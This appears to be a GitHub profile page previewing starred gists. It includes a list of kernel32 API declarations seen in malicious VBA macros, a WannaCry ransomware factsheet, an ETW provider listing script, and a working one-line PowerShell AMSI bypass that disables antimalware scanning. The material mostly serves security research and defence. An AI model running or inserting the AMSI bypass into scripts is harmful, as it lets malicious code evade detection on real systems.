Skip to content

Instantly share code, notes, and snippets.

View brianreitz's full-sized avatar

Brian Reitz brianreitz

13 followers · 0 following
View GitHub Profile
@JohnLaTwC
JohnLaTwC / APIs
Created February 12, 2020 21:00
Short List of APIs seen in VBA
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare PtrSafe Function GetCurrentProcessId Lib "kernel32" () As Long
Public Declare Function Keio2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function VEEAAM2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function wspPush2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Declare Function GetLogicalDrives& Lib "kernel32" ()
Declare Function GetShortPathName Lib "Kernel32.dll" Alias _
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" ( _
Declare Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long
Declare Function GlobalLock Lib "kernel32" (ByVal hMem As Long) As Long
@mattifestation
mattifestation / amsibypass.ps1
Created July 17, 2017 22:54
Compels AmsiScanBuffer/AmsiScanString to return E_INVALIDARG
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)
@rain-1
rain-1 / Wannacrypt0r-FACTSHEET.md
Last active March 10, 2024 11:03 — forked from Epivalent/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@garybernhardt
garybernhardt / types.markdown
Last active September 8, 2023 21:02

This document has moved!

It's now here, in The Programmer's Compendium. The content is the same as before, but being part of the compendium means that it's actively maintained.

@guitarrapc
guitarrapc / Get-EtwTraceProvider.ps1
Last active March 22, 2024 09:32
ETW (Event Tracing for Windows) Providers and their GUIDs for Windows 10 x64
#Requires -RunAsAdministrator
#Requires -Version 5.0
# requires Windows 10
Get-EtwTraceProvider | Select-Object SessionName, Guid | sort SessionName
# as Markdown
<#
#Requires -RunAsAdministrator
$result = Get-EtwTraceProvider | sort SessionName
$result | %{"|Name|GUID|";"|----|----|";}{"|$($_.SessionName)|$($_.Guid)|"}
#>